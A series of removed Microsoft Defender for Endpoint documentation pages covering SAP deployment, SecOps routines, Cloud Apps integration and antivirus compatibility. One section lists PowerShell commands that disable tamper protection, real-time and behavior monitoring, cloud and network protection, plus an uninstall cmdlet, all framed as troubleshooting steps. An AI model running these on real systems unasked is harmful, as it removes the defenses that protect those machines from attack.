-3. **Analyze SAPMNT, SAP TRANS_DIR, Spool, and Job Log directories**. If there are more than 100,000 files, consider archiving to reduce the number of files.
-
-4. **Confirm the performance limits and quotas of the shared file system used for SAPMNT**. The SMB share source could be a NetApp appliance, a Windows Server shared disk, or Azure Files SMB.
-
-5. **Configure exclusions so that all SAP application servers aren't scanning the SAPMNT share simultaneously**, as it could overload your shared storage server.
-
-6. **In general, host interface files on a dedicated non-SAP file server**. Interface files are recognized as an attack vector. Real-time protection should be activated on this dedicated file server. SAP Servers should never be used as file servers for interface files.
-
- > [!NOTE]
- > Some large SAP systems have more than 20 SAP application servers each with a connection to the same SAPMNT SMB share. 20 application servers simultaneously scanning the same SMB server may overload the SMB server. It is recommended to exclude SAPMNT from regular scans.
->
-## Important configuration settings for Defender for Endpoint on Windows Server with SAP
-
-1. **Get an overview of [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)**. In particular, review information about [next-generation protection](next-generation-protection.md) and [EDR](overview-endpoint-detection-response.md).
-
- > [!NOTE]
- > The term *Defender* is sometimes used to refer to an entire suite of products and solutions. See [What is Microsoft Defender XDR?](/microsoft-365/security/defender/microsoft-365-defender). In this article, we focus on antivirus and EDR capabilities in Defender for Endpoint.
-
-2. **Check the status of Microsoft Defender Antivirus**. Open Command Prompt, and then run these PowerShell commands:
-
- - `Get-MpComputerStatus`
- - `Get-MpPreference`
-
- The most significant settings for SAP are as follows:
-
- ```powershell
-
- Get-MpPreference |Select-Object -Property DisableCpuThrottleOnIdleScans, DisableRealtimeMonitoring, DisableScanningMappedNetworkDrivesForFullScan , DisableScanningNetworkFiles, ExclusionPath, MAPSReporting
-
- Get-MpComputerStatus |Select-Object -Property AMRunningMode, AntivirusEnabled, BehaviorMonitorEnabled, IsTamperProtected , OnAccessProtectionEnabled, RealTimeProtectionEnabled
-
- ```
-
-3. **Check the status of EDR**. Open Command Prompt, and then run the following command:
-
- `PS C:\Windows\System32> Get-Service -Name sense | FL *`
-
- You should see output that resembles the following code snippet:
-
- ```powershell
-
- Name : sense
- RequiredServices : {}
- CanPauseAndContinue : False
- CanShutdown : False
- CanStop : False
- DisplayName : Windows Defender Advanced Threat Protection Service
- DependentServices : {}
- MachineName : .
- ServiceName : sense
- ServicesDependedOn : {}
- ServiceHandle :
- Status : Running
- ServiceType : Win32OwnProcess
- StartType : Automatic
- Site :
- Container :
-
- ```
-
- The values you want to see are `Status: Running` and `StartType: Automatic`.
-
- For more information about the output, see [Review events and errors using Event Viewer](event-error-codes.md).
-
-4. **Make sure that Microsoft Defender Antivirus is up to date**. The best way to make sure your antivirus protection is up to date is by using Windows Update. If you encounter issues or get an error, contact your security team.
-
- For more information about updates, see [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md).
-
-5. **Make sure [behavior monitoring](behavioral-blocking-containment.md) is turned on**. If tamper protection is enabled, behavior monitoring is turned on by default. Use the default configuration of tamper protection enabled, behavior monitoring enabled, and real-time monitoring enabled unless a specific problem is identified.
-
- For more information, see [Built-in protection helps guard against ransomware](built-in-protection.md).
-
-6. **Make sure [real-time protection is enabled](configure-real-time-protection-microsoft-defender-antivirus.md)**. The current recommendation for Defender for Endpoint on Windows is to enable real-time scanning, with tamper protection enabled, behavior monitoring enabled, and real-time monitoring enabled, unless a specific problem is identified.
-
- For more information, see [Built-in protection helps guard against ransomware](built-in-protection.md).
-
-7. **Keep in mind how scans work with network shares**. By default, the Microsoft Defender Antivirus component on Windows scans SMB shared network file systems (for example, a Windows server share `\\server\smb-share` or a NetApp share) when these files are accessed by processes.
-
- [Defender for Endpoint EDR](overview-endpoint-detection-response.md) on Windows might scan SMB shared network file systems. The EDR sensor scans certain files that are identified as interesting for EDR analysis during file modification, delete, and move operations.
-
- Defender for Endpoint on Linux doesn't scan NFS file systems during [scheduled scans](linux-schedule-scan-mde.md).
-
-8. **Troubleshoot sense health or reliability issues**. To troubleshoot such issues, use the [Defender for Endpoint Client Analyzer tool](overview-client-analyzer.md). The Defender for Endpoint Client Analyzer can be useful when diagnosing sensor health or reliability issues on onboarded devices running either Windows, Linux, or macOS. Get the latest version of the Defender for Endpoint Client Analyzer here: [https://aka.ms/MDEAnalyzer](https://aka.ms/MDEAnalyzer).
-
-9. **Open a support case** if you need help. See [Contact Microsoft Defender for Endpoint support](contact-support.md).
-
-10. **If you're using production SAP VMs with [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction), keep in mind that Defender for Cloud deploys the Defender for Endpoint extension to all VMs**. If a VM isn't onboarded to Defender for Endpoint, it could be used as an attack vector. If you need more time to test Defender for Endpoint before deplying to your production environment, [contact support](contact-support.md).
-
-## Useful Commands: Microsoft Defender for Endpoint with SAP on Windows Server
-
-The following sections describe how to confirm or configure Defender for Endpoint settings by using PowerShell and Command Prompt:
-
-### Update Microsoft Defender Antivirus definitions manually
-
-Use Windows Update, or run the following command:
-
-`PS C:\Program Files\Windows Defender> .\MpCmdRun.exe -SignatureUpdate`
-
-You should see an output that resembles the following code snippet:
-
-```properties
-
-Signature update started . . .
-Service Version: 4.18.23050.9
-Engine Version: 1.1.23060.1005
-AntiSpyware Signature Version: 1.393.925.0
-Antivirus Signature Version: 1.393.925.0
-Signature update finished.
-PS C:\Program Files\Windows Defender>
-
-```
-
-Another option is to use this command:
-
-`PS C:\Program Files\Windows Defender> Update-MpSignature`
-
-For more information about these commands, see the following resources:
--- [MpCmdRun.exe](command-line-arguments-microsoft-defender-antivirus.md)-- [Update-MpSignature](/powershell/module/defender/update-mpsignature?view=windowsserver2022-ps&preserve-view=true)-
-### Determine whether EDR in block mode is turned on
-
-[EDR in block mode](edr-in-block-mode.md) provides added protection from malicious artifacts when Microsoft Defender Antivirus isn't the primary antivirus product and is running in passive mode. You can determine whether EDR in block mode is enabled by running the following command:
-
-`Get-MPComputerStatus|select AMRunningMode`
-
-There are two modes: Normal and Passive Mode. Testing with SAP systems was done only with `AMRunningMode = Normal` for SAP systems.
-
-For more information about this command, see [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus?view=windowsserver2022-ps&preserve-view=true).
-
-### Configure antivirus exclusions
-
-Before you configure exclusions, make sure that the SAP Basis team coordinates with your security team. Exclusions should be configured centrally and not at the VM level. Exclusions such as the shared SAPMNT file system should be excluded via a policy using the Intune admin tool.
-
-To view exclusions, use the following command:
-
-`Get-MpPreference | Select-Object -Property ExclusionPath`
-
-For more information about this command, see [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus?view=windowsserver2022-ps&preserve-view=true).
-
-For more information about exclusions, see the following resources:
--- [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md)-- [Contextual file and folder exclusions](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md)-
-### Configure EDR exclusions
-
-It isn't recommended to exclude files, paths, or processes from EDR as such exclusions comprise the protection from modern nonfile based threats. If necessary, open a support case with Microsoft Support via the Microsoft Defender portal specifying executables and/or paths to exclude. See [Contact Microsoft Defender for Endpoint support](contact-support.md).
-
-### Completely disable Defender for Endpoint on Windows for testing purposes
-
-> [!CAUTION]
-> It is not recommended to disable security software unless there is no alternative to solve or isolate a problem.
-
-Defender for Endpoint should be configured with [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) turned on. To temporarily disable Defender for Endpoint to isolate problems, it's recommended to use [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode).
-
-To shut down various subcomponents of the Microsoft Defender Antivirus solution, run the following commands:
-
-```powershell
-
-Set-MPPreference -DisableTamperProtection $true
-Set-MpPreference -DisableRealtimeMonitoring $true
-Set-MpPreference -DisableBehaviorMonitoring $true
-Set-MpPreference -MAPSReporting Disabled
-Set-MpPreference -DisableIOAVProtection $true
-Set-MpPreference -EnableNetworkProtection Disabled
-
-```
-
-For more information about these commands, see [Set-MpPreference](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true).
-
-> [!IMPORTANT]
-> You can't turn off EDR subcomponents on a device. The only way to turn off EDR is to [offboard the device](configure-endpoints-script.md#offboard-devices-using-a-local-script).
-
-To turn off [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md) (Microsoft Advanced Protection Service, or MAPS), run the following commands:
-
-```powershell
-
-PowerShell Set-MpPreference -MAPSReporting 0ΓÇï
-PowerShell Set-MpPreference -MAPSReporting DisabledΓÇï
-
-```
-
-For more information about cloud-delivered protection, see the following resources:
--- [Cloud protection and Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md)-- [Cloud protection and sample submission at Microsoft Defender Antivirus](cloud-protection-microsoft-antivirus-sample-submission.md) (if you're considering whether to use automatic sample submission with your security policies)-
-## Related articles
--- [Deployment guidance for Microsoft Defender for Endpoint on Linux for SAP](mde-linux-deployment-on-sap.md)--- [Microsoft Defender Antivirus on Windows Server](microsoft-defender-antivirus-on-windows-server.md)--- [Overview of endpoint detection and response](overview-endpoint-detection-response.md)
security Mde Sec Ops Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-sec-ops-guide.md
- Title: Security Operations Guide for Defender for Endpoint--
-description: A prescriptive playbook for SecOps personnel to manage Microsoft Defender for Endpoint.
- Previously updated : 02/07/2023------ nextgen-- admindeeplinkDEFENDER-- mde-ngp---- m365-security-- tier2--
-# Microsoft Defender for Endpoint Security Operations Guide
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article gives an overview of the requirements and tasks for successfully operating Microsoft Defender for Endpoint in your organization. These tasks help your security operations center (SOC) effectively detect and respond to Microsoft Defender for Endpoint detected security threats.
-
-This article also describes daily, weekly, monthly, and ad-hoc tasks your security team can perform for your organization.
-
-> [!NOTE]
-> These are recommended steps; check them against your own policies and environment to make sure they are fit for purpose.
-
-## Prerequisites:
-
-The Microsoft Defender Endpoint should be set up to support your regular security operations process. Although not covered in this document, the following articles provide configuration and setup information:
--- [**Configure general Defender for Endpoint settings**](preferences-setup.md) -
- - General
- - Permissions
- - Rules
- - Device management
- - Configure Microsoft Defender Security Center time zone settings
--- **Set up Microsoft Defender XDR incident notifications** <p> To get email notifications on defined Microsoft Defender XDR incidents, it's recommended that you configure email notifications. See [Incident notifications by email](../defender/incidents-overview.md#incident-notifications-by-email).--- **Connect to SIEM (Sentinel)** <p> If you have existing security information and event management (SIEM) tools, you can integrate them with Microsoft Defender XDR. See [Integrate your SIEM tools with Microsoft Defender XDR](../defender/configure-siem-defender.md) and [Microsoft Defender XDR integration with Microsoft Sentinel](/azure/sentinel/microsoft-365-defender-sentinel-integration).--- **Review data discovery configuration** <p> Review the Microsoft Defender for Endpoint device discovery configuration to ensure it's configured as required. See [Device discovery overview](device-discovery.md).-
-## Daily activities
-
-### General
--- **Review actions**-
- In the action center, review the actions that have been taken in your environment, both automated and manual. This information helps you validate that automated investigation and response (AIR) is performing as expected and identify any manual actions that need to be reviewed. See [Visit the Action center to see remediation actions](auto-investigation-action-center.md).
-
-### Security operations team
--- **Monitor the Microsoft Defender XDR Incidents queue**-
- When Microsoft Defender for Endpoint identifies Indicators of compromise (IOCs) or Indicators of attack (IOAs) and generates an alert, the alert is included in an incident and displayed in the **Incidents** queue in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
- Review these incidents to respond to any Microsoft Defender for Endpoint alerts and resolve once the incident has been remediated. See [Incident notifications by email](../defender/incidents-overview.md#incident-notifications-by-email) and [View and organize the Microsoft Defender for Endpoint Incidents queue](view-incidents-queue.md).
--- **Manage false positive and false negative detections**-
- Review the incident queue, identify false positive and false negative detections and submit them for review. This helps you effectively manage alerts in your environment and make your alerts more efficient. See [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md).
--- **Review threat analytics high-impact threats** -
- Review threat analytics to identify any campaigns that are impacting your environment.
- The "High-impact threats" table lists the threats that have had the highest impact to the organization. This section ranks threats by the number of devices that have active alerts. See [Track and respond to emerging threats through threat analytics](threat-analytics.md#view-the-threat-analytics-dashboard).
-
-### Security administration team
--- **Review health reports**
-
- Review health reports to identify any device health trends that need to be addressed. The device health reports cover Microsoft Defender for Endpoint AV signature, platform health, and EDR health. See [Device health reports in Microsoft Defender for Endpoint](device-health-reports.md).
--- **Check Endpoint detection and response (EDR) sensor health**-
- EDR health is maintaining the connection to the EDR service to make sure that Defender for Endpoint is receiving the required signals to alert and identify vulnerabilities.
-
- Review unhealthy devices. See [Device health, Sensor health & OS report](device-health-sensor-health-os.md).
--- **Check Microsoft Defender Antivirus health** -
- Viewing the status of Microsoft Defender Antivirus updates is critical for the best performance of Defender for Endpoint in your environment and up-to-date detections. The device health page shows current status for platform, intelligence, and engine version. See the [Device health, Microsoft Defender Antivirus health report](device-health-microsoft-defender-antivirus-health.md).
-
-## Weekly activities
-
-### General
--- **Message Center** -
- Microsoft Defender XDR uses the Microsoft 365 Message center to notify you of upcoming changes, such as new and changed features, planned maintenance, or other important announcements.
-
- Review the Message center messages to understand any upcoming changes that impact your environment.
-
- You can access this in the Microsoft 365 admin center under the Health tab. See [How to check Microsoft 365 service health](../../enterprise/view-service-health.md).
-
-### Security operations team
--- **Review threat reporting** -
- Review health reports to identify any device threat trends that need to be addressed. See [Threat protection report](threat-protection-reports.md).
--- **Review threat analytics** -
- Review threat analytics to identify any campaigns that affect your environment. See [Track and respond to emerging threats through threat analytics](threat-analytics.md).
-
-### Security administration team
--- **Review threat and vulnerability (TVM) status** -
- Review TVM to identify any new vulnerabilities and recommendations that require action. See [Vulnerability management dashboard.](../defender-vulnerability-management/tvm-dashboard-insights.md)
--- **Review attack surface reduction reporting** -
- Review ASR reports to identify any files that affect your environment. See [Attack surface reduction rules report](attack-surface-reduction-rules-report.md).
-
-- **Review web protection events**
-
- Review the web defense report to identify any IP addresses or URLs that are blocked. See [Web protection](web-protection-overview.md).
--
-## Monthly activities
-
-### General
-
-Review the following articles to understand recently released updates:
--- [What's new in Microsoft Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md)--- [What's new in Microsoft Defender for Endpoint on Windows](windows-whatsnew.md)--- [What's new in Microsoft Defender for Endpoint on Mac](mac-whatsnew.md) --- [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md) --- [What's new in Microsoft Defender for Endpoint on iOS](ios-whatsnew.md)
-
-- [What's new in Microsoft Defender for Endpoint on Android](android-whatsnew.md)-
-### Security administration team
--- **Review device excluded from policy**
-
- If any devices are excluded from Defender for Endpoint policies, review and determine whether the device still needs to be excluded from the policy.
-
- > [!NOTE]
- > Review the troubleshooting mode for troubleshooting. See [Get started with troubleshooting mode in Microsoft Defender for Endpoint](enable-troubleshooting-mode.md).
-
-## Periodically
-
-These tasks are seen as maintenance for your security posture and are critical for your ongoing protection. But as they may take time and effort, it's recommended that you set a standard schedule that you can maintain to perform these tasks.
--- **Review exclusions**
-
- Review exclusions that have been set in your environment to confirm you haven't created a protection gap by excluding things that are no longer required to be excluded.
---- **Review Defender policy configurations** -
- Periodically review your Defender configuration settings to confirm that they're set as required.
--- **Review automation levels**-
- Review automation levels in automated investigation and remediation capabilities. See [Automation levels in automated investigation and remediation](automation-levels.md).
--- **Review custom detections** -
- Periodically review whether the custom detections that have been created are still valid and effective. See [Review custom detection](../defender/custom-detection-rules.md).
--- **Review alerts suppression**-
- Periodically review any alert suppression rules that have been created to confirm they're still required and valid. See [Review alerts suppression](manage-alerts.md).
-
-## Troubleshooting
-
-The following articles provide guidance to troubleshoot and fix errors that you may experience when setting up your Microsoft Defender for Endpoint service.
--- [Troubleshoot Sensor state](check-sensor-status.md)-- [Troubleshoot sensor health issues using Client Analyzer](fix-unhealthy-sensors.md) -- [Troubleshoot live response issues](troubleshoot-live-response.md)-- [Collect support logs using LiveAnalyzer](troubleshoot-collect-support-log.md)-- [Troubleshoot attack surface reduction issues](troubleshoot-asr.md)-- [Troubleshoot onboarding issues](troubleshoot-onboarding.md)
-
security Microsoft Cloud App Security Config https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-config.md
- Title: Configure Microsoft Defender for Cloud Apps integration-
-description: Learn how to turn on the settings to enable the Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud Apps.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Configure Microsoft Defender for Cloud Apps in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-To benefit from Microsoft Defender for Endpoint cloud app discovery signals, turn on Microsoft Defender for Cloud Apps integration.
-
-> [!NOTE]
-> This feature will be available with an E5 license for [Enterprise Mobility + Security](https://www.microsoft.com/cloud-platform/enterprise-mobility-security) on devices running Windows 10 and Windows 11.
-
-> [!TIP]
-> See [Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud Apps](/cloud-app-security/mde-integration) for detailed integration of Microsoft Defender for Endpoint with Microsoft Defender for Cloud Apps.
-
-## Enable Microsoft Defender for Cloud Apps in Microsoft Defender for Endpoint
-
-1. In the navigation pane, select **Preferences setup** \> **Advanced features**.
-2. Select **Microsoft Defender for Cloud Apps** and switch the toggle to **On**.
-3. Click **Save preferences**.
-
-Once activated, Microsoft Defender for Endpoint will immediately start forwarding discovery signals to Defender for Cloud Apps.
-
-## View the data collected
-
-To view and access Microsoft Defender for Endpoint data in Microsoft Defender for Cloud Apps, see [Investigate devices in Defender for Cloud Apps](/cloud-app-security/mde-integration#investigate-devices-in-cloud-app-security).
-
-For more information about cloud discovery, see [Working with discovered apps](/cloud-app-security/discovered-apps).
-
-If you're interested in trying Microsoft Defender for Cloud Apps, see [Microsoft Defender for Cloud Apps Trial](https://signup.microsoft.com/Signup?OfferId=757c4c34-d589-46e4-9579-120bba5c92ed&ali=1).
-
-## Related topic
--- [Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-integration.md)
security Microsoft Cloud App Security Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-integration.md
- Title: Microsoft Defender for Cloud Apps integration overview-
-description: Microsoft Defender for Endpoint integrates with Defender for Cloud Apps by forwarding all cloud app networking activities.
------- m365-security-- tier2- Previously updated : 10/18/2018--
-# Microsoft Defender for Cloud Apps in Defender for Endpoint overview
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Cloud Apps is a comprehensive solution that gives visibility into cloud apps and services by allowing you to control and limit access to cloud apps, while enforcing compliance requirements on data stored in the cloud. For more information, see [Defender for Cloud Apps](/cloud-app-security/what-is-cloud-app-security).
-
-> [!NOTE]
-> This feature is available with an E5 license for [Enterprise Mobility + Security](https://www.microsoft.com/cloud-platform/enterprise-mobility-security) on devices running Windows 10 version 1809 or later, or Windows 11.
-
-## Microsoft Defender for Endpoint and Defender for Cloud Apps integration
-
-Defender for Cloud Apps discovery relies on cloud traffic logs being forwarded to it from enterprise firewall and proxy servers. Microsoft Defender for Endpoint integrates with Defender for Cloud Apps by collecting and forwarding all cloud app networking activities, providing unparalleled visibility to cloud app usage. The monitoring functionality is built into the device, providing complete coverage of network activity.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4r4yQ]
-
-The integration provides the following major improvements to the existing Defender for Cloud Apps discovery:
--- Available everywhere - Since the network activity is collected directly from the endpoint, it's available wherever the device is, on or off corporate network, as it's no longer depended on traffic routed through the enterprise firewall or proxy servers.--- Works out of the box, no configuration required - Forwarding cloud traffic logs to Defender for Cloud Apps requires firewall and proxy server configuration. With the Defender for Endpoint and Defender for Cloud Apps integration, there's no configuration required. Just switch it on in Microsoft Defender XDR settings and you're good to go.--- Device context - Cloud traffic logs lack device context. Defender for Endpoint network activity is reported with the device context (which device accessed the cloud app), so you are able to understand exactly where (device) the network activity took place, in addition to who (user) performed it.-
-For more information about cloud discovery, see [Working with discovered apps](/cloud-app-security/discovered-apps).
-
-## Related topic
--- [Configure Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-config.md)-
security Microsoft Defender Antivirus Compatibility https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility.md
- Title: Microsoft Defender Antivirus compatibility with other security products
-description: Learn about Microsoft Defender Antivirus with other security products and the operating systems.
-- Previously updated : 12/12/2023--------- m365-security-- tier2-- mde-ngp--
-# Microsoft Defender Antivirus compatibility with other security products
-
-**Applies to:**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-**Platforms**
-- Windows-
-Microsoft Defender Antivirus is available on endpoints running the following versions of Windows:
--- Windows 11-- Windows 10 -- Windows Server 2022-- Windows Server 2019-- Windows Server, version 1803, or newer-- Windows Server 2016-
-Microsoft Defender Antivirus is also available for older versions of Windows under certain conditions.
--- On Windows Server 2012 R2, when onboarded using the [modern, unified solution](/microsoft-365/security/defender-endpoint/configure-server-endpoints), Microsoft Defender Antivirus is installed in **Active mode**.--- On Windows 8.1, with [System Center Endpoint Protection](/previous-versions/system-center/system-center-2012-R2/hh508760(v=technet.10)), enterprise-level endpoint antivirus protection is offered and managed through Microsoft Endpoint Configuration Manager. --- On [consumer devices on Windows 8.1](/previous-versions/windows/it-pro/windows-8.1-and-8/dn344918(v=ws.11)#BKMK_WindowsDefender), Windows Defender is available (although it doesn't provide enterprise-level management).-
-If you're using non-Microsoft antivirus/antimalware software, you might be able to run Microsoft Defender Antivirus alongside the other antivirus solution. This article describes what happens with Microsoft Defender Antivirus and non-Microsoft antivirus/antimalware software, with and without [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md).
-
-## Antivirus protection without Defender for Endpoint
-
-This section describes what happens when you use Microsoft Defender Antivirus alongside non-Microsoft antivirus/antimalware products on endpoints that aren't onboarded to Defender for Endpoint.
-
-In general, Microsoft Defender Antivirus doesn't run in passive mode on devices that aren't onboarded to Defender for Endpoint.
-
-The following table summarizes what to expect:
-
-|Windows version|Primary antivirus/antimalware solution|Microsoft Defender Antivirus state|
-|:|:|:|
-|Windows 10 <br/>Windows 11|Microsoft Defender Antivirus|Active mode|
-|Windows 10 <br/>Windows 11|A non-Microsoft antivirus/antimalware solution|Disabled mode (happens automatically) <br/><br/> Note that in Windows 11, if SmartAppControl is enabled, Microsoft Defender Antivirus goes into passive mode.|
-|Windows Server 2022 <br/>Windows Server 2019<br/>Windows Server, version 1803, or newer <br/>Windows Server 2016 <br/>Windows Server 2012 R2 |Microsoft Defender Antivirus|Active mode|
-|Windows Server 2022<br/>Windows Server 2019<br/>Windows Server, version 1803, or newer <br/>Windows Server 2016 |A non-Microsoft antivirus/antimalware solution|Disabled<br/>(set manually; see the note that follows this table) |
-
-> [!NOTE]
-> On Windows Server, if you're running a non-Microsoft antivirus product, you can uninstall Microsoft Defender Antivirus by using the following PowerShell cmdlet (as an administrator): `Uninstall-WindowsFeature Windows-Defender`. Restart your server to finish removing Microsoft Defender Antivirus.
-> On Windows Server 2016, you might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus*.
-
-If the device is onboarded to Microsoft Defender for Endpoint, you can use Microsoft Defender Antivirus in passive mode as described later in this article.
-
-## Microsoft Defender Antivirus and non-Microsoft antivirus/antimalware solutions
-
-> [!NOTE]
-> In general, Microsoft Defender Antivirus can be set to passive mode only on endpoints that are onboarded to Defender for Endpoint.
-
-Whether Microsoft Defender Antivirus runs in active mode, passive mode, or is disabled depends on several factors, such as:
--- Which version of Windows is installed on an endpoint-- Whether Microsoft Defender Antivirus is the primary antivirus/antimalware solution on the endpoint-- Whether the endpoint is onboarded to Defender for Endpoint-
-The following table summarizes the state of Microsoft Defender Antivirus in several scenarios.
-
-| Antivirus/antimalware solution | Onboarded to Defender for Endpoint? | Microsoft Defender Antivirus state | Smart App Control State |
-|||||
-| Microsoft Defender Antivirus | Yes | Active mode | N/A |
-| Microsoft Defender Antivirus | No | Active mode | On, Evaluation, or Off |
-| A non-Microsoft antivirus/antimalware solution | Yes | Passive mode (automatically) | N/A |
-| A non-Microsoft antivirus/antimalware solution | No | Disabled (automatically) | Evaluation or On |
-
-> [!NOTE]
-> Smart App Control is a consumer-only product that's used on new Windows 11 installs. It can run alongside your antivirus software and block apps that are considered to be malicious or untrusted. [Learn more about Smart App Control](https://support.microsoft.com/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003).
-
-## Windows Server and passive mode
-
-On Windows Server 2019, Windows Server, version 1803 or newer, Windows Server 2016, or Windows Server 2012 R2, Microsoft Defender Antivirus doesn't enter passive mode automatically when you install a non-Microsoft antivirus product. In those cases, set Microsoft Defender Antivirus to passive mode to prevent problems caused by having multiple antivirus products installed on a server. You can set Microsoft Defender Antivirus to passive mode using a registry key as follows:
--- Path: `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`-- Name: `ForceDefenderPassiveMode`-- Type: `REG_DWORD`-- Value: `1`-
-You can view your protection status in PowerShell by using the command [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus). Check the value for `AMRunningMode`. You should see **Normal**, **Passive**, or **EDR Block Mode** if Microsoft Defender Antivirus is enabled on the endpoint.
-
-For passive mode to work on endpoints running Windows Server 2016 and Windows Server 2012 R2, those endpoints must be onboarded with the modern, unified solution described in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016).
-
-On Windows Server 2016, Windows Server 2012 R2, Windows Server version 1803 or newer, Windows Server 2019, and Windows Server 2022, if you're using a non-Microsoft antivirus product on an endpoint that *isn't* onboarded to Microsoft Defender for Endpoint, disable/uninstall Microsoft Defender Antivirus manually to prevent problems caused by having multiple antivirus products installed on a server. However, Defender for Endpoint includes capabilities that further extend the antivirus protection that is installed on your endpoint. If you have Defender for Endpoint, you can benefit from running Microsoft Defender Antivirus alongside another antivirus solution.
-
-For example, [Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md) provides added protection from malicious artifacts even if Microsoft Defender Antivirus isn't the primary antivirus product. Such capabilities require Microsoft Defender Antivirus to be installed and running in passive mode or active mode.
-
-> [!TIP]
-> On Windows Server 2016, you might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus*.
-
-## Requirements for Microsoft Defender Antivirus to run in passive mode
-
-In order for Microsoft Defender Antivirus to run in passive mode, endpoints must meet the following requirements:
--- Operating system: Windows 10 or newer; Windows Server 2022, Windows Server 2019, or Windows Server, version 1803, or newer <br/>(Windows Server 2012 R2 and Windows Server 2016 if onboarded using the [modern, unified solution](/microsoft-365/security/defender-endpoint/configure-server-endpoints)). -- Microsoft Defender Antivirus must be installed. -- Another non-Microsoft antivirus/antimalware product must be installed and used as the primary antivirus solution. -- Endpoints must be onboarded to Defender for Endpoint. -
-> [!IMPORTANT]
-> - Microsoft Defender Antivirus is only available on devices running Windows 10 and 11, Windows Server 2022, Windows Server 2016, Windows Server 2019, Windows Server, version 1803 or newer, Windows Server 2016, and Windows Server 2012 R2.
-> - Passive mode is only supported on Windows Server 2012 R2 & 2016 when the device is onboarded using the [modern, unified solution](/microsoft-365/security/defender-endpoint/configure-server-endpoints).
-> - In Windows 8.1, enterprise-level endpoint antivirus protection is offered as [System Center Endpoint Protection](/previous-versions/system-center/system-center-2012-R2/hh508760(v=technet.10)), which is managed through Microsoft Endpoint Configuration Manager.
-> - Windows Defender is also offered for [consumer devices on Windows 8.1](/previous-versions/windows/it-pro/windows-8.1-and-8/dn344918(v=ws.11)#BKMK_WindowsDefender), although Windows Defender does not provide enterprise-level management.
-
-## How Microsoft Defender Antivirus affects Defender for Endpoint functionality
-
-Defender for Endpoint affects whether Microsoft Defender Antivirus can run in passive mode. And, the state of Microsoft Defender Antivirus can affect certain capabilities in Defender for Endpoint. For example, real-time protection works when Microsoft Defender Antivirus is in active or passive mode, but not when Microsoft Defender Antivirus is disabled or uninstalled.
-
-> [!IMPORTANT]
-> - The table in this section summarizes the features and capabilities that are actively working or not, according to whether Microsoft Defender Antivirus is in active mode, passive mode, or disabled/uninstalled. This table designed to be informational only.
-> - **Do not turn off capabilities**, such as real-time protection, cloud-delivered protection, or limited periodic scanning if you are using Microsoft Defender Antivirus in passive mode, or if you are using [EDR in block mode](edr-in-block-mode.md), which works behind the scenes to detect and remediate malicious artifacts that were detected post-breach.
-
